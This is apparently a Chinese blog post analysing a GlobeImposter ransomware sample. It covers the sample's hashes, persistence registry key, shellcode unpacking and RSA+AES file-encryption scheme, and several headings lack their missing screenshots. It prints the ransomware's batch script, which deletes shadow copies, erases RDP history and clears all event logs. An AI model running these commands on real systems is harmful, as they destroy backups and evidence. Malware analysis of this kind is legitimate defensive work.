标签:shell color 9.png windows 思路 加密文件 public 卷影 family
样本来源:http://www.malware-traffic-analysis.net/2017/12/04/index.html
Kaspersky,NOD32,360均报毒:
MD5: 2908715EEC754ABA1AD21414B23CAFB6
SHA1: 4AF27F4B95F29F877D0ABB1167E6B1148C1849BD
CRC32: 64CAEB77
系统环境:win7_7600_x86
工具:
进行勒索:
文件加密:
文件加密为.doc后缀。
删除键值项:
Globlemposter家族病毒有两个主要的特征:
ShellCode执行和 PE文件释放执行。
内部采用TEA算法加密ShellCode:
Dump下来的ShellCode,修改0x400000属性为可执行,并释放了PE文件,跳到OEP执行。
把PE文件 dump下来分析,先列出其它行为。
复制文件,目录:C:\Users\15pb-win7\AppData\Roaming\PE.exe
设置启动项,键值:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\BrowserUpdateCheck
在Temp目录下创建.bat文件,运行.bat文件分别删除卷影、RDP连接历史记录、日志信息。
@echo off
vssadmin.exe Delete Shadows /All /Quiet
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
cd %userprofile%\documents\
attrib Default.rdp -s -h
del Default.rdp
for /F "tokens=*" %1 in (‘wevtutil.exe el‘) DO wevtutil.exe cl "%1"
cmd 执行 /c del C:\Users\15pb-win7\Desktop\PE.exe 自删除。
勒索病毒重点在于加密文件,所以重点对加密文件流程进行分析。
病毒采用的是RSA+AES的加密方式。
一般RSA与AES结合:
病毒变相的RSA与AES结合:
共有两对RSA公私钥:hac_pri 和 hac_pub,user_pri 和 user_pub。
加密文件的AES密钥。
用户ID:包含user_pri。
secret_Ekey:包含secret_key,跟解密的AES有关。
解密过程:
黑客拿到文件后,可以提取 用户ID 和 secret_Ekey。用自身的hac_pri解密用户ID得到user_pri。再用user_pri解密secret_Ekey得到secret_key。
计算文件的IV参数,结合secret_key计算即可得到AES密钥,用以解密文件。
hack_pub加密成哈希值生成用户ID,并做为FileName,创建文件在目录下。
目录:C:\Users\Public\AE09C984DF6E74640B3271EADB5DD7C65FDE806235B2CDA478E0EFA9129C09E7
哈希值:AE 09 C9 84 DF 6E 74 64 0B 32 71 EA DB 5D D7 C6 5F DE 80 62 35 B2 CD A4 78 E0 EF A9 12 9C 09 E7
hack_pub:
加密成hash:
创建文件:
创建线程加密文件:
遍历文件:
IV参数:
AES密钥:
加密 secret_key,并将 secret_Ekey 和 用户ID 写进文件。
特征包括:网络ip,字符串等等
致谢
15pb全体教师,以及教导我的所有人。
KID
标签:shell color 9.png windows 思路 加密文件 public 卷影 family
原文地址:https://www.cnblogs.com/KIDofot/p/9068205.html
